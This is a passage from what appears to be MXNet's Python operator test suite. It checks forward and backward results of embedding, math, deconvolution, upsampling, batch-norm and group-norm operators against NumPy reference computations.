np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = np.zeros(shape)  # the gradient of sign(x) is zero everywhere
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test._bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test._bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv._bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv._bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv._bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv._bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
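# For reference (an explanatory sketch, not part of the original tests): without an explicit
# target_shape, Deconvolution infers each spatial output dimension as
#   out = (in - 1) * stride - 2 * pad + kernel + adj
# e.g. the 2D case below with in=4, kernel=3, stride=2, pad=1, adj=1 gives
#   (4 - 1) * 2 - 2 * 1 + 3 + 1 = 8, matching default_target_size above.
def _deconv_out_dim(in_dim, kernel, stride, pad, adj):
    return (in_dim - 1) * stride - 2 * pad + kernel + adj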
@pytest.mark.serial
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y._simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up._bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
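# For illustration (not part of the original test): with root_scale=2, _init_bilinear builds a
# kernel of size 2*2 - 2%2 = 4 with c = (2*2 - 1 - 2%2) / (2.*2) = 0.75, so the 1D factor is
# 1 - |x/2 - 0.75| for x = 0..3, i.e. [0.25, 0.75, 0.75, 0.25], and the 2D kernel is the outer
# product of this vector with itself.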
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@xfail_when_nonstandard_decimal_separator
@pytest.mark.parametrize('op_name', ['BatchNorm', 'SyncBatchNorm'])
@pytest.mark.parametrize('shape', [(4, 2), (4, 3, 4),
(4, 6, 4, 5), (4, 5, 6, 4, 5)])
@pytest.mark.parametrize('fix_gamma', [False, True])
@pytest.mark.parametrize('cudnn_off', [False, True])
@pytest.mark.parametrize('output_mean_var', [False, True])
def test_batchnorm(op_name, shape, fix_gamma, cudnn_off, output_mean_var):
if op_name == 'BatchNorm':
op = mx.nd.BatchNorm
elif op_name == 'SyncBatchNorm':
op = mx.nd.contrib.SyncBatchNorm
else:
raise ValueError(f'Unsupported op_name: {op_name}')
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req):
kwargs = dict(output_mean_var=output_mean_var)
if op_name == 'SyncBatchNorm':
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
if not fix_gamma:
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad(grad_req=gamma_grad_req)
else:
bn_gamma = mx.nd.ones(shape=(nch,))
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad(grad_req=beta_grad_req)
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
adX, adW, adb = 0, 0, 0
is_train = data_grad_req != 'null' or \
(not fix_gamma and gamma_grad_req != 'null') or \
beta_grad_req != 'null'
for _ in range(num_iters):
if data_grad_req != 'add':
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=fix_gamma, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
if is_train:
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
m = np.prod(shape) / shape[axis]
# cudnn uses m-1 in the denominator of its sample variance calculation, not m
sample_var_adjust = 1.0 if cudnn_off or fix_gamma else m / (m-1)
running_var = running_var * momentum + \
data_var_flat * sample_var_adjust * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
adX = dX if data_grad_req != 'add' else adX + dX
adW = dW if gamma_grad_req != 'add' else adW + dW
adb = db if beta_grad_req != 'add' else adb + db
atol, rtol = 5e-2, 5e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
if is_train:
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
if data_grad_req != 'null':
assert_almost_equal(data.grad.asnumpy(),
adX.asnumpy(), atol=atol, rtol=rtol)
if not fix_gamma:
if gamma_grad_req != 'null':
assert_almost_equal(
bn_gamma.grad.asnumpy(), adW.asnumpy(),
atol=atol, rtol=rtol)
else:
assert((bn_gamma.asnumpy() == 1).all())
if beta_grad_req != 'null':
assert_almost_equal(
bn_beta.grad.asnumpy(), adb.asnumpy(), atol=atol, rtol=rtol)
grad_reqs = ['write'] if len(shape) != 4 else ['null', 'write', 'add']
for data_grad_req in grad_reqs:
for gamma_grad_req in grad_reqs:
if fix_gamma and gamma_grad_req != 'null':
continue
for beta_grad_req in grad_reqs:
for axis in range(len(shape)):
_test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req)
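# For reference (an explanatory note, not part of the original test): the hand-written reference
# computation inside _test_batchnorm_impl above follows
#   y = gamma * (x - mean) / sqrt(var + eps) + beta
# with the running statistics updated as running = running * momentum + batch_stat * (1 - momentum),
# which is what the assertions compare the operator outputs against.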
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, data.shape[1], 1, 1)  # per-channel gamma/beta broadcast over N, H, W
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat.reshape(dshape) * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out, mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, dshape[1], 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
gamma_grad = np.sum(x_hat * ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
x_hat_grad = ograd * gamma.reshape(1, num_groups, dshape[1] // num_groups, 1, 1)
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_channels,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
